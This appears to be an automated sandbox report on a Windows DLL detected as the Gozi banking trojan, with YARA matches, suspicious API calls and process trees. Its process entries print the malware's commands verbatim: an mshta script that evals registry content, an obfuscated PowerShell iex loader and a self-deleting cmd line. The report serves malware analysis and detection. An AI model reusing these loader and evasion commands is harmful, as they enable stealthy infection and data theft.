Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D7596 3_2_050D7596
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D826C 3_2_050D826C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D3EEB 3_2_050D3EEB
Source: C:\Windows\System32\control.exe Code function: 24_2_00E49870 24_2_00E49870
Source: C:\Windows\System32\control.exe Code function: 24_2_00E42990 24_2_00E42990
Source: C:\Windows\System32\control.exe Code function: 24_2_00E64900 24_2_00E64900
Source: C:\Windows\System32\control.exe Code function: 24_2_00E688EC 24_2_00E688EC
Source: C:\Windows\System32\control.exe Code function: 24_2_00E53880 24_2_00E53880
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4B85C 24_2_00E4B85C
Source: C:\Windows\System32\control.exe Code function: 24_2_00E621EC 24_2_00E621EC
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5F9DC 24_2_00E5F9DC
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5C148 24_2_00E5C148
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4F954 24_2_00E4F954
Source: C:\Windows\System32\control.exe Code function: 24_2_00E69120 24_2_00E69120
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5B12C 24_2_00E5B12C
Source: C:\Windows\System32\control.exe Code function: 24_2_00E412DC 24_2_00E412DC
Source: C:\Windows\System32\control.exe Code function: 24_2_00E69254 24_2_00E69254
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4BA38 24_2_00E4BA38
Source: C:\Windows\System32\control.exe Code function: 24_2_00E59BA8 24_2_00E59BA8
Source: C:\Windows\System32\control.exe Code function: 24_2_00E66B84 24_2_00E66B84
Source: C:\Windows\System32\control.exe Code function: 24_2_00E6A38C 24_2_00E6A38C
Source: C:\Windows\System32\control.exe Code function: 24_2_00E47B90 24_2_00E47B90
Source: C:\Windows\System32\control.exe Code function: 24_2_00E6BB34 24_2_00E6BB34
Source: C:\Windows\System32\control.exe Code function: 24_2_00E6630C 24_2_00E6630C
Source: C:\Windows\System32\control.exe Code function: 24_2_00E56B08 24_2_00E56B08
Source: C:\Windows\System32\control.exe Code function: 24_2_00E46310 24_2_00E46310
Source: C:\Windows\System32\control.exe Code function: 24_2_00E43CE0 24_2_00E43CE0
Source: C:\Windows\System32\control.exe Code function: 24_2_00E6ACF4 24_2_00E6ACF4
Source: C:\Windows\System32\control.exe Code function: 24_2_00E504D0 24_2_00E504D0
Source: C:\Windows\System32\control.exe Code function: 24_2_00E46CB8 24_2_00E46CB8
Source: C:\Windows\System32\control.exe Code function: 24_2_00E61C90 24_2_00E61C90
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5FC40 24_2_00E5FC40
Source: C:\Windows\System32\control.exe Code function: 24_2_00E44438 24_2_00E44438
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4DD20 24_2_00E4DD20
Source: C:\Windows\System32\control.exe Code function: 24_2_00E48E70 24_2_00E48E70
Source: C:\Windows\System32\control.exe Code function: 24_2_00E61620 24_2_00E61620
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5CE00 24_2_00E5CE00
Source: C:\Windows\System32\control.exe Code function: 24_2_00E437F0 24_2_00E437F0
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4FF68 24_2_00E4FF68
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4CF74 24_2_00E4CF74
Source: C:\Windows\System32\control.exe Code function: 24_2_00E6BF00 24_2_00E6BF00
Source: C:\Windows\System32\control.exe Code function: 24_2_00E59F0C 24_2_00E59F0C
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5271C 24_2_00E5271C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D3925 NtMapViewOfSection, 3_2_050D3925
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D625A GetProcAddress,NtCreateSection,memset, 3_2_050D625A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D60CC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_050D60CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D8491 NtQueryVirtualMemory, 3_2_050D8491
Source: C:\Windows\System32\control.exe Code function: 24_2_00E49870 NtSetContextThread,NtUnmapViewOfSection,NtClose, 24_2_00E49870
Source: C:\Windows\System32\control.exe Code function: 24_2_00E46034 NtAllocateVirtualMemory, 24_2_00E46034
Source: C:\Windows\System32\control.exe Code function: 24_2_00E55010 NtWriteVirtualMemory, 24_2_00E55010
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4C108 NtQueryInformationToken,NtQueryInformationToken,NtClose, 24_2_00E4C108
Source: C:\Windows\System32\control.exe Code function: 24_2_00E67AAC NtMapViewOfSection, 24_2_00E67AAC
Source: C:\Windows\System32\control.exe Code function: 24_2_00E44BE0 NtSetInformationProcess,ResumeThread,FindCloseChangeNotification, 24_2_00E44BE0
Source: C:\Windows\System32\control.exe Code function: 24_2_00E62300 NtQueryInformationProcess, 24_2_00E62300
Source: C:\Windows\System32\control.exe Code function: 24_2_00E56DA4 NtCreateSection, 24_2_00E56DA4
Source: C:\Windows\System32\control.exe Code function: 24_2_00E41D94 NtReadVirtualMemory, 24_2_00E41D94
Source: C:\Windows\System32\control.exe Code function: 24_2_00E45710 NtQueryInformationProcess, 24_2_00E45710
Source: C:\Windows\System32\control.exe Code function: 24_2_00E7C029 NtProtectVirtualMemory,NtProtectVirtualMemory, 24_2_00E7C029
Source: 7078612.dll Binary or memory string: OriginalFilenameHh5Ese.dll( vs 7078612.dll
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: 7078612.dll Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7078612.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_SECURITY size: 0xa address: 0x0
Source: 7078612.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\7078612.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qnma='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qnma).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll Jump to behavior
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jt23bwkp.2ng.ps1 Jump to behavior
Source: classification engine Classification label: mal100.bank.troj.expl.evad.winDLL@27/18@3/5
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D31AB CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 3_2_050D31AB
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{84B29C49-139C-5672-BDF8-F7EA41AC1BBE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{5CDEF802-0BE6-EE03-7550-6F0279841356}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3764:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 7078612.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050DA34C push eax; iretd 3_2_050DA351
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050DA344 push eax; iretd 3_2_050DA351
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050DA350 push eax; iretd 3_2_050DA351
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050DB352 pushfd ; ret 3_2_050DB361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D825B push ecx; ret 3_2_050D826B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D7E70 push ecx; ret 3_2_050D7E79
Source: C:\Windows\System32\control.exe Code function: 24_2_00E7C7BC push edi; iretd 24_2_00E7C7E9
Source: 7078612.dll Static PE information: real checksum: 0x872fe521 should be: 0x8a90a
Source: ogaysol0.dll.19.dr Static PE information: real checksum: 0x0 should be: 0xd29b
Source: bplkxjdz.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x45be
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ogaysol0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\bplkxjdz.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: Yara match File source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll
